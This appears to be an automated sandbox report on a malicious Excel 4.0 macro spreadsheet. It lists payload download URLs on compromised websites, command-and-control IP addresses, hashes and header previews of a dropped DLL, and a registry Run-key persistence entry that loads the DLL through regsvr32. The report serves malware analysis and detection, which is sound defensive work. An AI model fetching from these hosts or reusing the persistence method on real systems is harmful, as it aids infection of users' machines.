                        http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/100%Avira URL Cloudmalware
                        https://115.178.55.22:80/kwxkonang/0%Avira URL Cloudsafe
                        http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/100%Avira URL Cloudmalware
                        https://115.178.55.22:80/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/0%Avira URL Cloudsafe
                        https://172.105.115.71:8080/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/0%Avira URL Cloudsafe
                        http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/100%Avira URL Cloudmalware
                        https://172.105.115.71:8080/kwxkonang/0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        www.hsweixintp.com
                        		45.207.116.88
                        		truefalseunknown
                        cecambrils.cat
                        		185.23.117.132
                        		truefalseunknown
                        www.stickers-et-deco.com
                        		163.172.108.69
                        		truefalseunknown
                        web15f04.uni5.net
                        		187.1.136.16
                        		truefalse
                          		high
                          www.clinicaportalpsicologia.com.br
                          		unknown
                          		unknownfalse
                            		unknown
                            www.cecambrils.cat
                            		unknown
                            		unknowntrue
                              		unknown
                              hsweixintp.com
                              		unknown
                              		unknownfalseunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/false
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.cecambrils.cat/wp-content/cXEhHssszV/true
                              • Avira URL Cloud: malware
                              		unknown
                              https://218.38.121.17/kwxkonang/true
                              • Avira URL Cloud: safe
                              		unknown
                              https://218.38.121.17/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/false
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/false
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://172.105.115.71:8080/kwxkonang/regsvr32.exe, 00000006.00000003.1015548706.0000000000379000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.entrust.net/server1.crl0regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.entrust.net03regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://115.178.55.22:80/kwxkonang/regsvr32.exe, 00000006.00000003.1002662490.0000000000381000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://172.105.115.71:8080/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/regsvr32.exe, 0000000B.00000003.1163475701.0000000000270000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ocsp.entrust.net0Dregsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://secure.comodo.com/CPS0regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://115.178.55.22:80/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/regsvr32.exe, 0000000B.00000003.1150324980.0000000000271000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.105.115.71
                                    		unknownUnited States
                                    		63949LINODE-APLinodeLLCUStrue
                                    187.1.136.16
                                    		web15f04.uni5.netBrazil
                                    		28299IPV6InternetLtdaBRfalse
                                    188.165.79.151
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    196.44.98.190
                                    		unknownGhana
                                    		327814EcobandGHtrue
                                    174.138.33.49
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    36.67.23.59
                                    		unknownIndonesia
                                    		17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                                    103.41.204.169
                                    		unknownIndonesia
                                    		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                                    85.214.67.203
                                    		unknownGermany
                                    		6724STRATOSTRATOAGDEtrue
                                    83.229.80.93
                                    		unknownUnited Kingdom
                                    		8513SKYVISIONGBtrue
                                    198.199.70.22
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    93.104.209.107
                                    		unknownGermany
                                    		8767MNET-ASGermanyDEtrue
                                    186.250.48.5
                                    		unknownBrazil
                                    		262807RedfoxTelecomunicacoesLtdaBRtrue
                                    209.239.112.82
                                    		unknownUnited States
                                    		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                    175.126.176.79
                                    		unknownKorea Republic of
                                    		9523MOKWON-AS-KRMokwonUniversityKRtrue
                                    128.199.242.164
                                    		unknownUnited Kingdom
                                    		14061DIGITALOCEAN-ASNUStrue
                                    178.238.225.252
                                    		unknownGermany
                                    		51167CONTABODEtrue
                                    46.101.98.60
                                    		unknownNetherlands
                                    		14061DIGITALOCEAN-ASNUStrue
                                    190.145.8.4
                                    		unknownColombia
                                    		14080TelmexColombiaSACOtrue
                                    82.98.180.154
                                    		unknownSpain
                                    		42612DINAHOSTING-ASEStrue
                                    103.71.99.57
                                    		unknownIndia
                                    		135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                                    87.106.97.83
                                    		unknownGermany
                                    		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                    103.254.12.236
                                    		unknownViet Nam
                                    		56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                                    103.85.95.4
                                    		unknownIndonesia
                                    		136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                                    202.134.4.210
                                    		unknownIndonesia
                                    		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                    165.22.254.236
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    78.47.204.80
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    118.98.72.86
                                    		unknownIndonesia
                                    		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                    139.59.80.108
                                    		unknownSingapore
                                    		14061DIGITALOCEAN-ASNUStrue
                                    104.244.79.94
                                    		unknownUnited States
                                    		53667PONYNETUStrue
                                    37.44.244.177
                                    		unknownGermany
                                    		47583AS-HOSTINGERLTtrue
                                    51.75.33.122
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    160.16.143.191
                                    		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                    103.56.149.105
                                    		unknownIndonesia
                                    		55688BEON-AS-IDPTBeonIntermediaIDtrue
                                    85.25.120.45
                                    		unknownGermany
                                    		8972GD-EMEA-DC-SXB1DEtrue
                                    139.196.72.155
                                    		unknownChina
                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                    115.178.55.22
                                    		unknownIndonesia
                                    		38783SIMAYA-AS-IDPTSimayaJejaringMandiriIDtrue
                                    103.126.216.86
                                    		unknownBangladesh
                                    		138482SKYVIEW-AS-APSKYVIEWONLINELTDBDtrue
                                    128.199.217.206
                                    		unknownUnited Kingdom
                                    		14061DIGITALOCEAN-ASNUStrue
                                    114.79.130.68
                                    		unknownIndia
                                    		45769DVOIS-IND-VoisBroadbandPvtLtdINtrue
                                    45.207.116.88
                                    		www.hsweixintp.comSeychelles
                                    		136800XIAOZHIYUN1-AS-APICIDCNETWORKUSfalse
                                    103.224.241.74
                                    		unknownIndia
                                    		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                                    210.57.209.142
                                    		unknownIndonesia
                                    		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                                    202.28.34.99
                                    		unknownThailand
                                    		9562MSU-TH-APMahasarakhamUniversityTHtrue
                                    80.211.107.116
                                    		unknownItaly
                                    		31034ARUBA-ASNITtrue
                                    54.37.228.122
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    163.172.108.69
                                    		www.stickers-et-deco.comUnited Kingdom
                                    		12876OnlineSASFRfalse
                                    218.38.121.17
                                    		unknownKorea Republic of
                                    		9318SKB-ASSKBroadbandCoLtdKRtrue
                                    185.148.169.10
                                    		unknownGermany
                                    		44780EVERSCALE-ASDEtrue
                                    185.23.117.132
                                    		cecambrils.catUnited Kingdom
                                    		31708COREIX-UK-ASLondonGreatBritainGBfalse
                                    195.77.239.39
                                    		unknownSpain
                                    		60493FICOSA-ASEStrue
                                    178.62.112.199
                                    		unknownEuropean Union
                                    		14061DIGITALOCEAN-ASNUStrue
                                    62.171.178.147
                                    		unknownUnited Kingdom
                                    		51167CONTABODEtrue
                                    64.227.55.231
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue

                                    General Information

                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                    Analysis ID:747191
                                    Start date and time:2022-11-16 05:42:19 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 6m 28s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:Untitled-09112022.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@12/10@5/53
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 82.5% (good quality ratio 75.3%)
                                    • Quality average: 72.8%
                                    • Quality standard deviation: 32.3%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    05:43:24API Interceptor4x Sleep call for process: regsvr32.exe modified
                                    05:44:26AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run xoEOackyxDExhQ.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):636416
                                    Entropy (8bit):6.825556208271753
                                    Encrypted:false
                                    SSDEEP:6144:S6/ptuaN+qWUILr1HRf/9Mu1vHLI7U9XWiHgQ30/bP/09Xls9HV6MExbnyDAzlsH:S6/ptu/qerXtU7U9XGZWYobyDAzl+
                                    MD5:95E74674029DA73F1CDC0FFFFF65F490
                                    SHA1:3007175D3FEFDA0C274DB227A0E1F0954C577947
                                    SHA-256:26D38B712159C7A3574C91853B0011DCA3051FB2E80000F364AF4FC60A1B1B25
                                    SHA-512:633D407E89084B04A2D35E1E758CFBDE0B7D6ADFB0D5396B2D031AF1770CBFD097934DFE7193779CE6DFA00E92DDAF8A16DF97E322B725468475A82E4F2BC004
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 69%
                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                    Reputation:low
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................................\......\......\.r...........\......Rich...........................PE..d.....lc.........." ................T........................................ ............ ..........................................N..0... i..x.......h.......4;..............`.......................................8............................................text.............................. ..`.rdata..............................@..@.data...D*...........\..............@....pdata..4;.......<...j..............@..@_RDATA..............................@..@.rsrc...h...........................@..@.reloc..`...........................@..B................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\~DF4B3CBD39C4A4F2CA.TMP

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28672
                                    Entropy (8bit):3.356162402539466
                                    Encrypted:false
                                    SSDEEP:768:Am9gKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgACK:8Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgA
                                    MD5:246B1D2A8183FD0BD63916CA9EBB737C
                                    SHA1:5A6923EC5F27A1847EEA388FB0ED4823A0DA7843
                                    SHA-256:54DDBC22097FFF8FA45A72B6722860AC04F85C71C0224D6B9134F3134F8E1B5A
                                    SHA-512:1FA2AE0CAEFF3C5557A8998B7EC02B3C0C20054ABE2B09D6B4879FC6B2641F3AADA9D407D3EFC1E331A1FCCE5F4D682299517035CF5AFD050A9E47A7FE3A5C6C
                                    Malicious:false
                                    Reputation:low
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\~DF68E42B49200ACDE5.TMP

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\3H9RKW7J.txt

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):359
                                    Entropy (8bit):5.647674630438457
                                    Encrypted:false
                                    SSDEEP:6:7QXmFAh0Q0JRcVMTnpVY+6SiJS6DqVoJj51Udcvoufcv0wHOsSX1xFIIEF67X:mgY0QUnpP6SiFDqVWSQoTHMXRk67X
                                    MD5:A9CADDD42C45A20DA2609B237C5B6523
                                    SHA1:9F1EE10C7EE6E055EEF5CEAAD76586450F9AF81A
                                    SHA-256:3A447E4CB340C6FBD9A3A453B139452682AC34FB5F396423C18806FDFB7D58D7
                                    SHA-512:06AC22B5ECB24D93E6FC9BDD3BA3D82BFD9FAC25CC3A2D9A939DCA7D550DD26316425999558F3AC8D2E2EF7BCB312180207EA52950F5E1F3865C5211DD7C5AFB
                                    Malicious:false
                                    Preview:PrestaShop-76bfdce226b740dc1298019a18e61155.454f5619c2242a2b3d522efeae2f6c48a578aba8c10278d9f2d8899a3fcad222%3A7VXP1JRg6sMvuxPANoFERLi7pCnrxsYqh8BZef4CZlrnQztM92Sg9jLq7GIDevQzzQ9P0reTobhVinLo3QJBWkBFdKI37ltxfwgwuTELet01SKQ4bMLcAdkfSwCEuWEVYtW0yeVouVHIO8jPqvQEHfrz8a8OziW2SVas17jQLdQ%3D.www.stickers-et-deco.com/.9216.1117681408.31000877.1714585437.30996929.*.

                                    C:\Users\user\Desktop\41778653.tmp (copy)

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 8 19:22:48 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):93696
                                    Entropy (8bit):5.495625974977679
                                    Encrypted:false
                                    SSDEEP:1536:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgDbCXuZH4gb4CEn9J4ZFSsx:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgr
                                    MD5:F9382AF6D575DD2A072229C7A25FD170
                                    SHA1:42275E405131460B1B76D3EE8CACC16A66039F76
                                    SHA-256:998EA53B19DD586D91608E76F17B0A92ABE3033E52D146EE3495EC260DB59DC1
                                    SHA-512:DDCBA8C57BC2E79E3671C0D8D9FF62BC308C010055362F879A1CA0A0E0B7E327F5E16F0E7DE682AD487C638D38A4C946E87F1C639A1D053B4A582856AA3B4AA6
                                    Malicious:false
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.....................................................=........P..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...

                                    C:\Users\user\Desktop\4DF60000

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Gydar, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 16 13:43:55 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):94208
                                    Entropy (8bit):5.48045160479881
                                    Encrypted:false
                                    SSDEEP:1536:bVk3hOdsylKlgxopeiBNhZFGzE+cL2kdAvbCXuZH4gb4CEn9J4ZSRkP6Cx4:5k3hOdsylKlgxopeiBNhZFGzE+cL2kdz
                                    MD5:7B471565086AF4FC47970C5EC04076BB
                                    SHA1:4A302700FD9F485E5B3B4F38C8047CEA9FD66CB1
                                    SHA-256:FDCD4B4EA6350C416F1B3FE6B352B5185D1CCCFFC4608A06AF2538C40F03097F
                                    SHA-512:2EF71C68C770BEB91E9BF5AB1A33D0476F0547FE45D5C1CB5CE16DF6FCA978F1EF1CE83640153A91B70F73360787ECEE4DEA6C9243A63A0F380F61ED30E77A30
                                    Malicious:false
                                    Yara Hits:
                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\4DF60000, Author: John Lambert @JohnLaTwC
                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\4DF60000, Author: Joe Security
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f2..........................\.p....user B.....a.........=.....................................................=........K..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...

                                    C:\Users\user\Desktop\4DF60000:Zone.Identifier

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\Desktop\Untitled-09112022.xls

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 8 19:22:48 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):93696
                                    Entropy (8bit):5.495625974977679
                                    Encrypted:false
                                    SSDEEP:1536:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgDbCXuZH4gb4CEn9J4ZFSsx:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgr
                                    MD5:F9382AF6D575DD2A072229C7A25FD170
                                    SHA1:42275E405131460B1B76D3EE8CACC16A66039F76
                                    SHA-256:998EA53B19DD586D91608E76F17B0A92ABE3033E52D146EE3495EC260DB59DC1
                                    SHA-512:DDCBA8C57BC2E79E3671C0D8D9FF62BC308C010055362F879A1CA0A0E0B7E327F5E16F0E7DE682AD487C638D38A4C946E87F1C639A1D053B4A582856AA3B4AA6
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\Untitled-09112022.xls, Author: John Lambert @JohnLaTwC
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=.....................................................=........P..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...

                                    C:\Users\user\elv1.ooocccxxx

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):636416
                                    Entropy (8bit):6.825556208271753
                                    Encrypted:false
                                    SSDEEP:6144:S6/ptuaN+qWUILr1HRf/9Mu1vHLI7U9XWiHgQ30/bP/09Xls9HV6MExbnyDAzlsH:S6/ptu/qerXtU7U9XGZWYobyDAzl+
                                    MD5:95E74674029DA73F1CDC0FFFFF65F490
                                    SHA1:3007175D3FEFDA0C274DB227A0E1F0954C577947
                                    SHA-256:26D38B712159C7A3574C91853B0011DCA3051FB2E80000F364AF4FC60A1B1B25
                                    SHA-512:633D407E89084B04A2D35E1E758CFBDE0B7D6ADFB0D5396B2D031AF1770CBFD097934DFE7193779CE6DFA00E92DDAF8A16DF97E322B725468475A82E4F2BC004
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 69%
                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................................\......\......\.r...........\......Rich...........................PE..d.....lc.........." ................T........................................ ............ ..........................................N..0... i..x.......h.......4;..............`.......................................8............................................text.............................. ..`.rdata..............................@..@.data...D*...........\..............@....pdata..4;.......<...j..............@..@_RDATA..............................@..@.rsrc...h...........................@..@.reloc..`...........................@..B................................................................................................................................................................................

                                    C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy)

                                    Download File
                                    Process:C:\Windows\System32\regsvr32.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):636416
                                    Entropy (8bit):6.825556208271753
                                    Encrypted:false
                                    SSDEEP:6144:S6/ptuaN+qWUILr1HRf/9Mu1vHLI7U9XWiHgQ30/bP/09Xls9HV6MExbnyDAzlsH:S6/ptu/qerXtU7U9XGZWYobyDAzl+
                                    MD5:95E74674029DA73F1CDC0FFFFF65F490
                                    SHA1:3007175D3FEFDA0C274DB227A0E1F0954C577947
                                    SHA-256:26D38B712159C7A3574C91853B0011DCA3051FB2E80000F364AF4FC60A1B1B25
                                    SHA-512:633D407E89084B04A2D35E1E758CFBDE0B7D6ADFB0D5396B2D031AF1770CBFD097934DFE7193779CE6DFA00E92DDAF8A16DF97E322B725468475A82E4F2BC004
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 69%
                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................................\......\......\.r...........\......Rich...........................PE..d.....lc.........." ................T........................................ ............ ..........................................N..0... i..x.......h.......4;..............`.......................................8............................................text.............................. ..`.rdata..............................@..@.data...D*...........\..............@....pdata..4;.......<...j..............@..@_RDATA..............................@..@.rsrc...h...........................@..@.reloc..`...........................@..B................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 8 19:22:48 2022, Security: 0
                                    Entropy (8bit):5.4949958293874035
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 78.94%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                    File name:Untitled-09112022.xls
                                    File size:93696
                                    MD5:8079b54a0c76ba1fec822059aa22ea31
                                    SHA1:c71c6fd2c68cc8746e778e907984927458a13ab8
                                    SHA256:9d0827721715ca365e0138d9a0bbef43bf209005605793b35e3e9b73337426a6
                                    SHA512:f3e1e9cee5c0a6c183be525a64fc333ef008d14bd62bc86b5fec32e44175411b40e997f52620f46540181e933544ebdc9da764424927e594ffa984231161567e
                                    SSDEEP:1536:wKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgDbCXuZH4gb4CEn9J4ZFSsM:wKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgO
                                    TLSH:FE932A86B2F9D89DEA19C734889B4390A762EC204B574BCB3244F3667FB0D501F53697
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4eea286a4b4bcb4

                                    Static OLE Info

                                    General

                                    Document Type:OLE
